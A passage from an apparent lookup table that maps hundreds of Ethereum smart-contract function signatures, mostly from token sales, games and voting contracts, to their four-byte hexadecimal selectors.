"0x113ce458", "LOCKUP_6M_ICO_TIMESTAMP()": "0x870b399a", "PRETDESupplyRemaining()": "0xc269f263", "preIcoTokenSupply()": "0x23d88efd", "fttIssued()": "0x4a1fb241", "withdrawalMoneyBack()": "0xe36dd1f9", "frozenDaysForEarlyInvestor()": "0x4b82ee28", "reinvestment_share()": "0x9b6b838c", "relayContractAddress()": "0xdfa93d64", "BANKROLL()": "0x8e4ab74b", "teamV()": "0xcda368c3", "tokenCreationCapPreICO()": "0x852da11d", "ADVISERS_SUPPLY()": "0x66e23276", "advisorTimeLock()": "0xb0d1a26c", "userWithdrawalStartTime()": "0xf7e2ff00", "getChickenAmount()": "0x270abf36", "INTREPID_MAX_PRICE()": "0x48fb7332", "getConsecutiveDeaths()": "0xe65b1fd0", "releaseTokensSaleCount()": "0xfa31e684", "dad()": "0x689da08e", "balanceToWithdraw()": "0x95f1260b", "teamVestTokenAllocation()": "0xadc87956", "model()": "0x0ad9d052", "currentTournamentBank()": "0x9d619dad", "minPresaleWei()": "0xaf567633", "mineCount()": "0xb03d169c", "didProve()": "0xad1088e4", "currentIndex()": "0x26987b60", "prolongationPermitted()": "0xc18715f8", "lastPayOut()": "0x0c6cbf92", "RANGEEND_PRESALE()": "0x71b1d2d3", "exchangeAdapterManager()": "0xca626232", "anacoContract()": "0x58838594", "transferBonusEarnings()": "0x2f65be54", "affiliatThreshold2()": "0xf51c2907", "ends()": "0x79c597ff", "bonusClosingTime1()": "0xeef6f89d", "alreadyHarvestedTokens()": "0x09fba360", "ethereumWei()": "0x28c9ca90", "hiddenOwner()": "0xfbbdb68c", "developReserveWallet()": "0x514d717c", "PREICO_HARDCAP()": "0x1ee9f029", "vanilCoin()": "0x714e2ec9", "workedTodayInSeconds()": "0x2753f254", "IONIATOKEN()": "0xd35e6537", "maxTokenForPreSale()": "0x72c91cdd", "OFFSET19700101()": "0xa3f144ae", "contributorsShare()": "0x0f40988e", "SUPPLY_FOR_REFERAL()": "0xc2845184", "unlockedReserveAndTeamFunds()": "0x3b809273", "_batch3_rate()": "0x8fdf741a", "totalPrizes()": "0x25e6c304", "_round()": "0xa876a8a0", "supply_cap()": "0xeaac77ea", "trustedSender()": "0x6927cac5", "joinPot()": "0x11daca81", "lastBetBlockNumber()": "0x25c9307d", "PRESALE_MINIMUM_FUNDING()": "0x475ec95a", "PUBLIC_SALES_2_PERIOD_END()": "0x86aa354a", "minimumAmountToParticipate()": "0x4c80f5c1", "minimumWeiAmount()": "0x2e80e77c", "Time_Start_Crowdsale()": "0x0c7b5616", "itemReturn()": "0x6e9cfb79", "unfreezeCount()": "0xc590c994", "maxInterestTime_()": "0xfdc40466", "Strike()": "0x81531c64", "randomNumberIncome()": "0x697fd39e", "totalPrayers()": "0xf780259e", "totalBondSupply_BULL()": "0x62aecc47", "publicTokens()": "0xf577a5d0", "tournamentContract()": "0xfbeb89dd", "assetType()": "0x3fe3347a", "minTradingStartTime()": "0x6881f6f1", "FOUNDER_TWO()": "0x66875a31", "candidate()": "0x6c8381f8", "dfs()": "0x825e04d3", "midTermHolding()": "0x19d9217c", "usdPerEthMax()": "0x4cef0cb9", "withdrawInviteReward()": "0x9e8f2750", "saleFirstEarlyBirdEndBlock()": "0x8d2d2563", "earlyInvestorSupply()": "0xb104c509", "DAppReady()": "0xa7909e47", "operatingFund()": "0x63d17806", "gasFee()": "0x658612e9", "RECYCLE_TIME()": "0x7c1a35d7", "tokenPtx()": "0x323c20fa", "MIN_INVEST_ETHER()": "0x6a2d1cb8", "maxNum()": "0x4dfdc21f", "vestingRegistered()": "0x82672482", "icoRound6()": "0xc87e8bd0", "pastFiveMinutes()": "0x2a9b6dee", "developersCut()": "0x76c7b434", "Tier_Starter()": "0x9f915aca", "savings_goal()": "0xedbb1d43", "TOTAL_SUPPLY_UPPER_BOUND()": "0x2be5e93a", "decimalsFactor()": "0xf054d139", "soldKeys()": "0xc3bcb586", "burnFeeDenominator()": "0xc18f4831", "feesD()": "0x3efa8d51", "transfer_enabled()": "0xf4e1358a", "PVP_BATTLE()": "0x45d6c9db", "thirdBonusSalesEnds()": "0x82ee282b", "currentEpoch()": "0x76671808", "necropolisContract()": "0xb6a79409", "GVPE_address()": "0xb87c01e3", "AVAILABLE_TOTAL_SUPPLY()": "0xa92259fc", "toContractAddr()": "0xd94b9843", "DOW_TUE()": "0x126702a0", "preIco()": "0x4b56b10d", "operationTokenCreated()": "0x05e53535", "yesToken()": "0xf0d9bb20", "bountyTokensLeft()": "0xb931b484", "withdrawAttacker()": "0xe664755b", "TokenOPSSaleAddress()": "0xe11583b7", "roundTwoAmount()": "0xb7d9d7b9", "releasedBountyTokens()": "0x7ce1e2eb", "summReserveFund()": "0xa5e7a31c", "distributeARTToken()": "0xd66847df", "out3Done()": "0x73333128", "profitAddr()": "0xbf176c34", "devteamReserve()": "0xbe888bd7", "COMPANY_TOKENS()": "0xc1e41f38", "garanteSystemDepositInOneFund()": "0x7b436fa4", "gasPriceOraclize()": "0x62fc178b", "FEE_SELECT_MAX_VALUE()": "0x26ea9268", "crowdsaleMinted()": "0xf239c5dd", "feePercent_()": "0xc862a134", "maxRaiseAmount()": "0x5b22bbd2", "presaleStop_13_December()": "0x78a90a59", "etherGetBase()": "0x227a7911", "managementWalletAddress()": "0x1f7d16f7", "numTokensLeft()": "0x87dcfd2d", "countInvestorsRefundedInCrowdsale()": "0x1776b437", "EGGS_TO_HATCH_1Dragon()": "0xd55d1fed", "CROWDSALE_TARGET()": "0xeec8d544", "claimTeamTokens()": "0x2af5356a", "worldCupResultPart3()": "0x6b6d294e", "owner_()": "0xe7663079", "getUnsoldToken()": "0x8872c094", "DEV_SUPPLY()": "0xc05f486e", "ConfirmManager()": "0x70ce90d5", "salesdeadline()": "0x00fac74a", "initPecul()": "0xbb340909", "payableWeiReceived()": "0xbb59b48c", "transferactive()": "0x073d9a28", "MKRUSD()": "0x809fc4f8", "priceStep3()": "0xc4752773", "StaffWallet()": "0x6b5e3ca4", "wei25()": "0xcca9943c", "knightEquity()": "0xba7435d9", "partner_1_name()": "0xf3072020", "AgriChainDocuments()": "0xfe2622a5", "agency()": "0x3b91ee26", "REFUND_PERCENT()": "0x3ef37e30", "firstBonusSalesEnds()": "0x4f4ef121", "whitelister_address()": "0x4e012918", "marketToken2020()": "0x84ec480c", "prevHodlers()": "0x4883c9dc", "FileHash()": "0x47516910", "_batch2_icosaleStartTimestamp()": "0xf39259d0", "referral()": "0x1441a5a9", "incentiveDistributionInterval()": "0x64d582c0", "pgoVault()": "0x9fa0fc4c", "crowdsaleSoftCap()": "0xe6a43d63", "TOKEN_SUPPLY_SEED_LIMIT()": "0x29d24cbe", "maxAnonymousContribution()": "0x499ff236", "gasPrc()": "0xfe856722", "tokenCreator()": "0xdb84252c", "lastBlock_f10Hash_uint256()": "0xcf09c6dd", "partner2_voted_update_prenup()": "0xa31f2c52", "TOKENS_CAP()": "0x1f00c55b", "updateAllRewPaid()": "0x99f91c5d", "freezeTime()": "0xfd7e1bee", "minSaleAmount()": "0xfd085b41", "Token_5()": "0x7790a5d2", "pvt_plmt_set()": "0x4854bde0", "STAGES()": "0x5706d99a", "BASE_PRICE()": "0xf86325ed", "remainingReserveSupply()": "0x887c7f92", "ahs()": "0x723c308f", "vault_state()": "0x9ee9dd5c", "FIRST_PHASE_MAX_SPAN()": "0x5e2ea5bd", "COOPERATE_REWARD()": "0x56fb46d7", "detOwner()": "0x7a223758", "secondCurrentAmount()": "0x21491e82", "apiAddress()": "0xe546bb0c", "rlc_team()": "0x5353e168", "chain()": "0xc763e5a1", "SelfDestructTime()": "0x9abd7d50", "icoStartAt()": "0x0c2e4bf4", "ico2Max()": "0xa05c47ca", "myPendingPayment()": "0x1dd0c71b", "totalReturnedCredit()": "0xb9413c47", "ETHEREMON_PROCESSOR()": "0xe7e7e3e8", "STARTING_BULLS()": "0x95803d6c", "fundDepositAddress()": "0x74c85591", "burnAddress()": "0x70d5ae05", "_reward()": "0x1be0717f", "priceUSD()": "0x93a408d7", "usdEth()": "0x8bbade4e", "MINIMUM_SELLING_UCCOIN()": "0x2e7248bf", "autoPlayBot()": "0xc47fae76", "minimumBidAmount()": "0x49399729", "totalNumberAvailable()": "0x42c7ea5f", "fundingExchangeRate()": "0x80504271", "apt()": "0x9f52b74e", "max_bet()": "0x6a8e8711", "authorAddress()": "0x02a86781", "PRE_ICO_BONUS_TIME_3()": "0xbb777028", "ReserveManager()": "0xfcb806ac", "DUNE_BUGGY()": "0xd99969df", "StgOnebonusEnds()": "0xc4813b2c", "rewardUnitsRatePerYear()": "0xc44088fd", "KEBABER_TO_MAKE_1KEBAB()": "0x5d57135a", "amount2()": "0x057bfcc7", "Exchanges()": "0x54bc16f2", "feed()": "0x37a7b7d8", "addressDev()": "0x09553b28", "MAX_CAP()": "0xd669e1d4", "chronus()": "0x84304ee5", "tokenSales()": "0x56b9a8ab", "endBuffer()": "0x3e07905e", "fuel()": "0x279bad16", "currentPlayers()": "0x9cf8ccfd", "theWinningReferral()": "0xa2e0ee3e", "minPaymentWei()": "0x7467bcd9", "buyInSharePrice()": "0x397182ef", "lastOwner()": "0x8a56ca45", "krs()": "0xb9098b33", "supplyLockedA()": "0xa0234a91", "requestsFunded()": "0x91ff6baf", "maxPerExchangeBP()": "0x714d497a", "ETH_Rate()": "0x7e11f453", "sPerDate()": "0x8b7d38a1", "totalUnreleasedTokens()": "0xe4818a5d", "mysteriumPricing()": "0x2921441e", "bonusPercentage()": "0x813d6c9a", "totalContractMiniGame()": "0x6a76c522", "addOnCount()": "0x043331ee", "GAME_COST()": "0x491e55db", "codeSize()": "0x0434a44d", "noContract()": "0xafd7bf92", "tokenMintInit()": "0x7bdbab0c", "GetWinningAddress()": "0x1e45de61", "issuerTokenName()": "0x57cb48c9", "endTimes()": "0x75deadfa", "TIME_MULTIPLIER()": "0xfdd2f2b0", "team_fund()": "0x251b5f8e", "icoSoldTokens()": "0x43d42780", "one_ether_usd_price()": "0x9b18d79a", "cappedTokenSupply()": "0xcd27f1d9", "quater2()": "0x5cd50b3f", "deathData_v2()": "0xa173ba2f", "mintableToken()": "0x95d38ea8", "serverPort()": "0xe0b3198c", "c4cfee()": "0xacde39d9", "dropCount()": "0x66c14e0a", "kelly()": "0x2fc15517", "tgrSettingsMinimalContribution()": "0x13a1da40", "totalaccumulated()": "0xed1f1656", "phase_3_remaining_tokens()": "0xff9e3948", "endFirstWeek()": "0x3c1593ab", "presaleWeiContributed()": "0x593c993c", "capRound2()": "0x0ca40865", "BAQToken()": "0x621e9a45", "angelSaled()": "0xdcc1fd02", "pastOneDay()": "0x00baea15", "getBetTitle()": "0xc7cc63aa", "teamTokensHolder()": "0xed6a897d", "currentId()": "0xe00dd161", "delayPayout()": "0xac588536", "retraitStandard_3()": "0xc21ea693", "distributionteamFinished()": "0xb97ce4d3", "isPreICOFinished()": "0x9f406c8b", "thirdStageDuration()": "0xb5ce3600", "Token_2()": "0x014a897d", "feewallet()": "0xe4d534cb", "_detailsLength()": "0x3ab71189", "genesisCallerAddress()": "0xfb656067", "raiseDay2()": "0xd01678f0", "current_supply()": "0x6aea5f1b", "TakePot()": "0xae96bf2c", "totalPayed()": "0xbc579103", "claimC2()": "0x8db0816a", "myBackerToken()": "0x9ff61487", "IWTfund()": "0x6db9ec44", "tokenAmountPerUser()": "0x7f52fcae", "gotResult()": "0xd849eeba", "collectorAddress()": "0xc973c2e3", "startRoundA()": "0x88394fdc", "previousWithdrawal()": "0x87297093", "tokenVendor()": "0xa3766f88", "PHASE_DURATION()": "0x4ae2b849", "vows()": "0xd081b681", "getDailyPlayers()": "0xdeed2be0", "LBC()": "0x4592282e", "maxAppeals()": "0xda93f938", "t_Slava2()": "0xd65aabc1", "startLockPeriod()": "0x24d6169c", "getThisAddress()": "0xd3953822", "LOWER_PRICE_RESET_PERCENTAGE()": "0xdc35a6bd", "deferredTotalTokens()": "0xc205afd4", "startSeedStage()": "0xab1377c0", "totalMaxSupply()": "0xa0617ad0", "payoutToReferrer()": "0x819384a2", "summFounders1()": "0xc1f19220", "NUM_TEAMS()": "0x30a8b2c9", "raiseDay3()": "0x9cc73a6f", "voteAgree()": "0x1725b847", "staff_2()": "0x92ad728b", "InvestorPart()": "0xdad950f4", "canExchange()": "0x070f52f4", "tokenSoldPreICO()": "0x82a35706", "weekOneStart()": "0x8356a5b5", "blockTransfering()": "0xfed1c977", "token18KstepCAP()": "0x8026efaa", "bonusInited()": "0xc10e7dfe", "DST_TEAM()": "0x3aa435a5", "minorPartnerAddress()": "0xd700071a", "CTO_Signature()": "0x13163d53", "marketingCap()": "0xe608d3e5", "blocksPerRound()": "0x6e4ed796", "gameGiftOnceAmount()": "0xda2c0460", "platformWallet()": "0xfa2af9da", "transferFeePercentage()": "0x9d11aaaa", "totalRice()": "0x9feda172", "ADDR_MAYA_TEAM()": "0x9df0a5df", "periodDuration()": "0xb470aade", "PHOENIX_POOL()": "0xba081b8d", "maximumSaleLimitUnits()": "0x3e3dae41", "decimalNum()": "0xad2b260a", "beatTeamWallet()": "0xe44d6f04", "institutionStageSetting()": "0x61632d4d", "SaleAuction()": "0x349296a5", "PRESALE_CAP()": "0xbd94fafc", "tokenPriceMin()": "0xb4c2aaee", "startICOTime()": "0x7c2464f3", "SENS_PER_ETH_BASE_RATE()": "0xea72d9de", "mobilinkTeamAddress()": "0x26ed794b", "numMatches()": "0x85445829", "calculateStep(uint256)": "0x22c30931", "formula(uint256)": "0x14c0ffdc", "calcaultePrizes(uint256,uint256)": "0x73de3570", "getNumWinners(uint256)": "0x86a8da37", "getPrizeAmount(uint256)": "0xa1f1de65", "move(address)": "0x23cadd34", "calcaultePrizes()": "0x98db173f", "getStat()": "0x2b71b0e5", "getNumWinners()": "0x39624847", "getPrizeAmount()": "0xecca9c2e", "HeavyLitecoin()": "0x55b4bb4b", "MVPToken()": "0xc6f067d1", "getDestinationByIndex(uint256)": "0xf2e55ac1", "countDestinations()": "0xb6a0a119", "getOriginByIndex(uint256)": "0xbe169856", "countOrigins()": "0xbc9c58f6", "claimLeftTokens()": "0x67be5eac", "setStopDate(uint256)": "0x3302ece0", "PreICO(address,uint256,address)": "0x13bb7b0d", "Showcoin()": "0x72efa4ef", "VERDICT()": "0x593ea3e7", "VINCToken()": "0x741430ad", "resolve(bytes32)": "0x5c23bdf5", "setAirDropPayableTag(bool,uint256)": "0x35446c78", "setAirDropShadowTag(bool,uint256)": "0x085ca679", "Test(uint256,string,uint8,string)": "0x6304fa3a", "GodeCoin(address,address)": "0xbecee565", "bytesToBytes7(bytes1[7])": "0x97ea6e15", "lastID()": "0xe31a9d92", "addDedication(uint256,string)": "0x88eb944b", "mint(address,bytes32,uint256)": "0xc89dcfce", "getInfo(address)": "0xffdd5cf1", "isMining(address)": "0xc4163518", "sync(address)": "0xa5841194", "rewardPerNode()": "0x613ff46f", "addNode(address)": "0x9d95f1cc", "proxyWithdraw(address)": "0x60528e7b", "calcBonusAt(uint256)": "0x16af001c", "calcBonus()": "0xba61021f", "SynchroCoin(uint256,uint256,uint256,address)": "0x39a2bc8d", "CHESSToken()": "0x291f37a4", "getMyLobster()": "0x571080ae", "getFreeLobster()": "0x89dcbbf9", "setFreeLobster(uint16)": "0x846e980d", "LobsterFarm()": "0xf61c6c4b", "unfreezeAddress(address)": "0xbfb80547", "freezeAddress(address)": "0x51e946d5", "targetReached()": "0x3bde5ba8", "CrowdSale(address,uint256)": "0x6e459cf1", "NANJCOIN()": "0xe337db6e", "createContract(bytes,uint256)": "0x3fe9bf0e", "getAmount(bytes)": "0x4ce18d6b", "calcConfirmsNeeded(uint256,uint256)": "0x1f934299", "checkRequiredChange(uint256,uint256)": "0x9a003b61", "checkRemoveOwnerArgs(uint256,uint256,uint256)": "0xfa785263", "checkNewOwnerArgs(uint256,uint256,uint256)": "0xf02175c7", "checkChangeOwnerArgs(uint256,uint256)": "0xb37edfb6", "get_card()": "0xd2f32d94", "cards_metal_total()": "0x3c55563e", "operations()": "0x8b33b4b2", "CentraSale()": "0x5dbbd139", "finishDistribute()": "0xe5612b3b", "distributeAIC(address[],uint256)": "0x53663c0b", "AKAIITO()": "0x90cf3fed", "moveTokenToAccount(address,uint256)": "0xa20cd047", "FundCrowdsale()": "0xa6d930bb", "getFreeShrimp()": "0x23b3c771", "MiningRigFarmer()": "0x775af9df", "getLeftChildI(uint256)": "0xa4f7c2b7", "getParentI(uint256)": "0xaa17e768", "updateParams(uint256,uint256,uint256,uint256)": "0xb0557bf1", "XPAToken(address,address,uint256,uint256,uint256)": "0xb7f6a75a", "destruct(address)": "0x1beb2615", "publish(bytes12)": "0x02400845", "trust(address,bool)": "0x06262f1b", "trusted(address,address)": "0x7aa3295b", "transferPresaleTokens(address,uint256)": "0x9b03a211", "mintPresaleTokens(uint256)": "0x8db8053b", "unpauseTokens()": "0xa417357c", "pauseTokens()": "0xe5e231dd", "BoutsCrowdsale(uint256,uint256,uint256,address,address,address)": "0x8ee3f472", "setRemainingTokensWallet(address)": "0x143fb46d", "mintToAddressesAndAmounts(address[],uint256[])": "0x27de1a4d", "mintToAddresses(address[],uint256)": "0xf190ac5f", "transferMintMaster(address)": "0x249bc291", "MintableMasterToken()": "0xcbcd5dfe", "computeAmountBonus(uint256)": "0x816273f6", "computeTimeBonus()": "0x77c8d5a0", "computeBonus(uint256)": "0x5ac5f82c", "setBonusesForAmounts(uint32[],uint32[])": "0x835f6775", "bonusesForAmountsCount()": "0x53da0c7e", "setBonusesForTimes(uint32[],uint32[])": "0x1d1eda5e", "bonusesForTimesCount()": "0x1e05e0c8", "BonusCrowdsale(uint256)": "0x1e8812f3", "PausableCrowdsale(bool)": "0x51a8c3d7", "TokensCappedCrowdsale(uint256)": "0xa9d07519", "setFinished(bool)": "0xa7e2cca9", "bonusPercentForWeiAmount(uint256)": "0xdb395d2e", "VoxelX()": "0x84feed25", "contributionInCauldronRound(uint8,address,uint32)": "0xaacf3f2e", "Tachyon(uint256,string,uint8,string)": "0x936b360d", "NeedsCoin()": "0x327419b7", "FortaToken()": "0x616e2fd0", "subLockValue(address,uint256)": "0xe59bcf52", "addLockValue(address,uint256)": "0x79e23483", "TOSInstitutionsIncentiveContract()": "0x3ccf5861", "buyWithCustomerId(uint256)": "0x068365ec", "TOKECOIN()": "0x876da006", "rewardController(address)": "0x2a29d109", "updateMember(address,uint256,uint256,uint256)": "0xd3fe1ae1", "determineDate()": "0x7cf7b9f4", "BodyOneToken(address)": "0x86715acf", "liquidityStatus()": "0x309b40b2", "switchLiquidity(bool)": "0x087038db", "accountFrozenStatus(address)": "0x81fc7f2b", "BZCToken(address,uint256)": "0x8ca74163", "getDateCount()": "0xa55e9370", "setOracleAddress(address,address)": "0x46093b0e", "deployTokenContract(uint256)": "0x0f90b83a", "setBaseToken(address)": "0x16bb6c13", "setVariables(uint256,uint256,uint256,uint256)": "0xf497463a", "setUserContract(address)": "0xa1206d4e", "setDeployer(address)": "0x96214735", "setSwapFee(uint256)": "0x34e19907", "getTokenType(address)": "0x93272baf", "setWhitelistedMemberTypes(uint256[])": "0x0e2b75cc", "setMemberContract(address)": "0x316b13b4", "getMembershipType(address)": "0xb5b7916b", "getIndexByAddress(address,address)": "0x8dfda5ae", "getBalanceAndHolderByIndex(uint256,address)": "0x174dcea8", "addressCount(address)": "0x8811a0ae", "pay(address,address)": "0xbd0af85d", "getFactoryAddress()": "0xa9c2e36c", "createToken(uint256,address,address)": "0xe6ed51b7", "newContract(address,address,uint256)": "0x548dd51e", "_setOutcome(int256)": "0xbf28d7ee", "setup(string)": "0x2bc38531", "mcs()": "0xba0c9b54", "sendDivsToBankroll()": "0x1c575f7f", "intervalueToken(uint256,string,string)": "0x8b6bf3dd", "GUAEX(uint256,string,string)": "0xfbfb76c4", "BCTVToken(uint256,string,string)": "0x79dc04c0", "getTokensForStage(uint256,uint256)": "0x73139c0d", "getRealAmountBonus(uint256,uint256,uint256)": "0xbb471d73", "isRefundable()": "0x2c1fecfe", "canBuy(address)": "0x0808f3eb", "NamoToken()": "0xcec63cea", "getBase()": "0xd104a136", "deployContract(uint256)": "0x1cf41a81", "payToken(address,address)": "0xecb14519", "createToken(uint256,address,uint256)": "0x2a7292d0", "getContractBal()": "0x5d9fa6fc", "getSidesArray(uint256)": "0x6e968bca", "_completeTask(uint256,uint256)": "0x6abb51a5", "solveTask(uint256,uint256,uint256,int256,uint256,int256)": "0xfb1de995", "createBitcoinAddressPrefixTask(bytes,uint256,int256,uint256,int256,address)": "0x67a88f78", "payForTask(uint256)": "0x477fe4e6", "setReferrerFee(uint256)": "0xf81a95db", "setServiceFee(uint256)": "0x5cdf76f8", "publicKeyVerify(uint256,uint256,uint256)": "0x66ce10b7", "ecmulVerify(uint256,uint256,uint256,uint256,uint256)": "0x022079d9", "ecmul(uint256,uint256,uint256)": "0x8081a1e7", "ecadd(uint256,uint256,uint256,uint256)": "0xbb8c256a", "isPausedICO()": "0x793a2cd1", "isHardcapReached()": "0xc97a06ce", "changeIcoDeadLine(uint256)": "0x359cc28e", "changeAdminUser(address)": "0xf672e4d8", "hasClaimed(address,uint256)": "0xb2931096", "getOwnerAddress(uint256)": "0xdd550958", "getCurrentOwners()": "0x63e8dd96", "setDistributionMinimum(uint256)": "0x182ee07f", "setContribution(address,uint256)": "0xceb88ff4", "OriginalVirtualOperation()": "0xb840b421", "paidTokensOf(address)": "0xdde42067", "defineCurrentPeriod(uint256,uint256)": "0x14d4ecd9", "Exafire()": "0xfa9e6f11", "StudyCoin()": "0x8663b4c7", "OmiseGOGold()": "0xc4ef92d3", "FindTheCureCoin()": "0x34e8ecea", "withdrawMobileAppCoin(address)": "0x770506c1", "MAC()": "0xf751c2f5", "EarnEnoughMoney()": "0xb88a374c", "HavvenGold()": "0x004d39b1", "withdrawPot()": "0x0c76316d", "giftCode(string,address)": "0xfe79bfd0", "registerCode(string)": "0xe177bb9b", "start(uint256,uint256)": "0x8fb4b573", "_registerReferral(string,address)": "0xd88b2da2", "codeToAddress(string)": "0x9932dc05", "referralCodeAt(address,uint256)": "0x1f535833", "numberOfReferralCodes(address)": "0xce021384", "countryInfo(uint256)": "0xf3d448d2", "totalInfo()": "0x77ce52f8", "validCountryId(uint256)": "0x20c9d73c", "validNick(string)": "0x70c4488d", "validReferralCode(string)": "0xa308c2a7", "percentageOf(uint256,uint256)": "0xb71051e2", "ticketsForWithExcess(uint256)": "0x961cd8ce", "goldenTicketPrice(uint256)": "0xc3a869e6", "regularTicketPrice()": "0x604a4f9d", "crowdSaleOngoing()": "0x2936ce62", "numberOfTransactions()": "0xf8d3afa4", "tokensaleSecondsToStart()": "0xb77e60dd", "CFOAddress()": "0x298ad569", "tokenValueMultiplier()": "0xdc602df2", "airAmount()": "0x07cc6051", "WEI_MAXIMUM_EARLYPURCHASE()": "0xf0e02bd6", "catalog()": "0x074c09eb", "ICO_TokenValue()": "0x5aac8aad", "FEED2()": "0x4be39f2f", "GetAccountIsNotFrozenForReturnCount()": "0x70b0d4ac", "preICOActive()": "0x3aa89e83", "zec()": "0x9d12e775", "PRICE_MULTIPLIER()": "0x113990b8", "miniGameId()": "0x6231775b", "winningaddr()": "0x487ff8b6", "chainStartTime()": "0x5b054f9b", "SECOND_TIER_DISCOUNT()": "0xed4dd2ab", "tgeCap()": "0x8ca0dd20", "_airdropAmount()": "0x47d6cd6b", "icoStartUnix()": "0xcd9d12f2", "Founder2()": "0x880cab29", "HALF_TIME()": "0x4f9d482a", "endDateOfSaleStageLast()": "0x21a4a5bb", "TokenWalletHolder()": "0x651c5c84", "minListingSeconds()": "0x6c912080", "phase_5_Time()": "0xebb9b466", "tokenForComunity()": "0x0cd641b2", "isTokenized()": "0x74229301", "emergencyFlag()": "0xb4007cda", "PING_ORACLE_INTERVAL()": "0x60975988", "crowdsaleContract()": "0x31616395", "preEndTime()": "0xa12c2564", "fundWallet()": "0x664a1ad6", "team_release_epoch()": "0xf70ad595", "stageTwoSupply()": "0xb230eda1", "inititalSupply()": "0x26d3e7e8", "bonusPreset()": "0x38a9a6f8", "preSaleTokenRaised()": "0x96f099bc", "teamLimit()": "0x643ce525", "total_reward_amount()": "0xb3850b2a", "numParticipants()": "0x4e76a846", "preicoStartDate()": "0x679b4567", "maxBurnThreshold()": "0xb19ab945", "startTimeTLP1()": "0x9f7ed5b8", "tenthTime()": "0x71535f0d", "fundingEndTimestamp()": "0x16aab1bf", "__price()": "0x87609d1a", "betInfo()": "0x4ea201cc", "newAtomFee()": "0xfa314c67", "PACK_SIZE()": "0x3d0c9cc4", "usedReveralSupply()": "0x33283e59", "percentForTeam()": "0x60fece43", "privateEventActive()": "0x8d15b307", "timeVault()": "0xf4660ff5", "periodITO_mainCapInUSD()": "0x62d576bd", "pollBurnInc()": "0xe3bfdcfe", "platformFundingPerEpoch()": "0xdfd1be58", "confirm2stage()": "0x7a5310b9", "winning_country_string()": "0x50adc70a", "initialBankrollGrowthAmount()": "0x9e5cdaf0", "See_TokenPurchaser_Number()": "0xa4df8ca1", "_totalEtherDonated()": "0x09478fb7", "Location()": "0xec0be13d", "EIP712DOMAIN_TYPEHASH()": "0xc49f91d3", "advisorLock()": "0xb8499750", "FLIGHT_NUMBER()": "0xe1a6df9e", "log()": "0x51973ec9", "getMinContributionInWei()": "0xa1672717", "devAddr()": "0xda09c72c", "founder3()": "0xfb38ec94", "firstBuyers()": "0xc58cc060", "priceChangeBlock()": "0x1921c454", "m_controller()": "0xd7311963", "total_wei_given()": "0xf4dae266", "RESERVE_TOKEN_AMOUNT()": "0x27b5aaf8", "isMultiSigWallet()": "0x4c3a6ae0", "_minimumTokens()": "0xae3b94b2", "winnerLimit()": "0x911a739e", "LOTTERY_FUND_ADDRESS()": "0xb58f4a24", "priceUSDcETH()": "0xd971da94", "getAllTheFunds()": "0x5abedab2", "middleTimestamp()": "0x7d3c5961", "lockPeriod2()": "0xae7f5da4", "RATE_NO_DISCOUNT()": "0xad498ce1", "GOD()": "0xaf30ee3f", "currentIDnumber()": "0xc0472889", "createPerRound()": "0x1effc0d8", "isYesWinning()": "0x5cd7d478", "raceNum()": "0x4629e619", "PRIME_VESTING_DATE()": "0xb0445a77", "applyAndLockSettings()": "0xaf653861", "MIN_FEE()": "0x76c7a3c7", "unsoldContract()": "0x618fb1a6", "minorOwnerShares()": "0x94b5ed6d", "PERCENTAGE_OF_TOKENS_SOLD_IN_SALE()": "0x352fd696", "buyRedirect()": "0x012d61e1", "issuerAddress()": "0xa63234e0", "minimum_bet()": "0x84571235", "APP_ADDR_NAMESPACE()": "0x178e6079", "test_curatorDoesNotVeto()": "0x676d7769", "test_curatorDoesVeto()": "0xbf98976e", "test_CuratorRules()": "0x595f0e5e", "test_curators()": "0xf9781eae", "setupRules()": "0xc462bd11", "createBoard(address)": "0x131fa183", "createRules(address,address[])": "0x608cc40a", "blockTransfer(uint256)": "0xc0a39fb0", "CuratedWithWarnings(address[],address,address[],address[])": "0x81d5e753", "testEvent2()": "0xc1747585", "testFunc()": "0x037a417c", "voteToCandidateIndex(uint256)": "0x8b67430e", "isTokenValid(string)": "0x33e2df5d", "alreadyVoted(string)": "0x44e4d226", "publishResult(string,string)": "0x8932dc3d", "vote(string,string,uint256)": "0x7a4c96ad", "stopElection()": "0x2df9feaa", "startElection()": "0x62d73eb8", "addCandidate(string)": "0x462e91ec", "Election(string)": "0xf34f5f45", "dynamicLength(bytes4,bytes)": "0x62a31c4a", "outsize(bytes4,bytes)": "0x7041d925", "destination(bytes4,bytes)": "0xb3206453", "lookup(bytes4,bytes)": "0xfe3ce632", "lookup(string)": "0xf67187ac", "mint(int256,address)": "0xa909fc56", "calculateAmount(address)": "0x40b7b240", "getLedger()": "0xf36f235d", "setConfig(address,uint256)": "0xc6195d36", "GoldTokenMinter()": "0x522dba5b", "setMintTokenOwner(int256,address,address)": "0x4a9952c7", "setStdOwner(address,address)": "0x95d9cc18", "FooMintToken(int256)": "0xb2f0575c", "test_0_createOpenController_test_methods()": "0x5ac14935", "_voteAs(address,uint256,uint256,uint256,string)": "0x6ea521d9", "getAcceptedAndRejectedVotes(uint256,uint256)": "0x1f23a9bc", "getProposalVote(uint256,uint256,uint256)": "0x03d4e98a", "getProposalVoteCount(uint256,uint256)": "0x7fff9f1a", "vote(uint256,uint256,uint256,string)": "0xa034b6cb", "init(string,string,uint8,address)": "0x98cbefbe", "MintableToken()": "0x2cbf9cf6", "IouRootsToken(uint256,address,string,string,uint8)": "0x9ad0c86c", "RtcCoin(uint256)": "0x4495147b", "getWei()": "0x3ba15036", "sendWei(address)": "0x148f2e5e", "isAddressAuthorized(address,address)": "0x09d87ab5", "revokeRequestorAddress(address)": "0x18fa11ab", "authorizeRequestorAddress(address)": "0xf068dc81", "addRequestorAddress(address)": "0xc31d309a", "getRemainingBlocks()": "0xf5938baf", "getRequestorAddresses()": "0xbc064863", "getSendAmount()": "0x90b08a52", "setSendAmount(uint256)": "0x266b059e", "getBlockLimit()": "0x6a2e882b", "setBlockLimit(uint256)": "0x11355585", "MeshPoint(int256,string,address)": "0x8b110e0a", "getRequestStatus(uint256,uint256)": "0xbe9a9a28", "getDocumentHash(uint256)": "0x8796ec86", "getEncryptedKeyFromRequest(uint256,uint256)": "0x6efe39a3", "getDocumentName(uint256)": "0xc6b547e6", "getRequestOwner(uint256,uint256)": "0x36a31de5", "getOpenRequestPublicKey(uint256,uint256)": "0x0fa7a798", "getLastRequestId(uint256)": "0x9152f0b2", "requestDocument(uint256,string)": "0xa6b2df9b", "denyAccess(uint256,uint256)": "0xd3f40a02", "grantAccess(uint256,uint256,string)": "0x8d10215e", "newDocument(string,string)": "0x1a148644", "DocumentManager()": "0xd41e3281", "getBid(int256)": 